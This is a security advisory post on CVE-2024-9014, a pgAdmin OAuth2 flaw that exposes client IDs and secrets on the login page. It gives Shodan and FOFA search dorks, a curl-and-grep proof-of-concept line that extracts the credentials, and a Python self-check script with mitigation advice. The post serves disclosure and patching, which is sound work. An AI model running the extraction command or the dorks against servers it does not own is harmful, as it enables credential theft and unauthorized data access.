CVE-2024-9014 pgAdmin Authentication Bypass

OAuth Flaw in pgAdmin leads to Authentication Bypass with severe data breach impact.

Oct 13, 2024 - 12:35
Oct 13, 2024 - 17:14

About pgAdmin

pgAdmin is the most popular and feature-rich open source administration and development platform for PostgreSQL, the most advanced open source database in the world.

Shodan Mapping

Dork: http.title:"pgAdmin 4"

Total IP: 5,277

FOFA Mapping

Dork: "pgadmin4"

Total IP: 27,018

CVE-2024-9014

pgAdmin versions 8.11 and earlier are vulnerable to a security flaw in OAuth2 authentication. This vulnerability allows an attacker to potentially obtain the client ID and secret, leading to unauthorized access to user data.

Impact: Severe Data Breach

CVSS Version 3.x

Base Score: 9.9 CRITICAL

Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Nuclei Template

https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2024/CVE-2024-9014.yaml

Proof of Concept by EQSTLab

curl [URL_TO_TEST]/login?next=/ | grep -o '"oauth2Config": \[.*\]' | sed 's/"oauth2Config": //'

If the command above fails because the server presents a self-signed or otherwise untrusted certificate, add the curl option -k to skip TLS certificate verification:

curl -k [URL_TO_TEST]/login?next=/ | grep -o '"oauth2Config": \[.*\]' | sed 's/"oauth2Config": //'
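The same check as a self-assessment script, added here and not part of the original post or the EQSTLab repository: it parses a saved copy of the login page, locates the embedded oauth2Config array, and reports only which credential keys are present, never their values. The key names OAUTH2_CLIENT_ID and OAUTH2_CLIENT_SECRET and the JSON layout of the two sample pages are assumptions, not captured output from a real server.

```python
import json
import re

# Keys that should never reach an unauthenticated client. The names are
# assumed from pgAdmin's OAUTH2_CONFIG setting; adjust if your config differs.
SENSITIVE_KEYS = {"OAUTH2_CLIENT_ID", "OAUTH2_CLIENT_SECRET"}


def extract_oauth2_config(html):
    """Return the oauth2Config list embedded in a login page, or None."""
    m = re.search(r'"oauth2Config"\s*:\s*', html)
    if not m:
        return None
    try:
        # raw_decode parses one JSON value starting at the given offset and
        # ignores whatever follows it, so surrounding page markup is harmless.
        obj, _ = json.JSONDecoder().raw_decode(html, m.end())
    except json.JSONDecodeError:
        return None
    return obj if isinstance(obj, list) else None


def audit_login_page(html):
    """Report whether the page leaks OAuth2 credentials, without echoing them."""
    cfg = extract_oauth2_config(html)
    if cfg is None:
        return {"vulnerable": False, "providers": 0, "leaked_keys": []}
    leaked = sorted({k for p in cfg if isinstance(p, dict)
                     for k in p if k in SENSITIVE_KEYS})
    return {"vulnerable": bool(leaked), "providers": len(cfg), "leaked_keys": leaked}


# Constructed sample pages (not captured from a real pgAdmin instance).
VULNERABLE_PAGE = """<script>
window.pgAdmin = {"loginBanner": "", "oauth2Config": [{"OAUTH2_NAME": "google",
"OAUTH2_DISPLAY_NAME": "Google", "OAUTH2_CLIENT_ID": "example-id",
"OAUTH2_CLIENT_SECRET": "example-secret"}], "other": 1};
</script>"""

PATCHED_PAGE = """<script>
window.pgAdmin = {"oauth2Config": [{"OAUTH2_NAME": "google",
"OAUTH2_DISPLAY_NAME": "Google"}]};
</script>"""

if __name__ == "__main__":
    for name, page in (("vulnerable", VULNERABLE_PAGE), ("patched", PATCHED_PAGE)):
        print(name, audit_login_page(page))
```

Run it against the output of `curl -s [URL_TO_TEST]/login?next=/` saved to a file to confirm whether your own instance still exposes the client secret after updating.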

Mitigation

Update pgAdmin to the latest version

References

[1] https://nvd.nist.gov/vuln/detail/CVE-2024-9014

[2] https://github.com/EQSTLab/CVE-2024-9014


Abhirup Konwar

A skilled and passionate bug hunter with multiple recognitions, including NASA Hall of Fame and being ranked in the top 1% on TryHackMe. I have secured numerous high-profile organizations such as American Systems, Bluescape, Clemson University, and Melbourne University. My work has been acknowledged by prestigious institutions like NCIIPC, UKRI, and the World Health Organization (WHO). I've reported over 1,000 vulnerabilities on the openbugbounty platform, with notable achievements including discovering critical Remote Code Execution (RCE) vulnerabilities in Drexel University, University of Victoria, University of Minnesota, and ii.tudelft.nl. Additionally, I have secured organizations like NeuRA, Appfluence Inc., and the US Department of Energy. My commitment to cybersecurity extends globally, with a mission to safeguard industries and continuously share knowledge.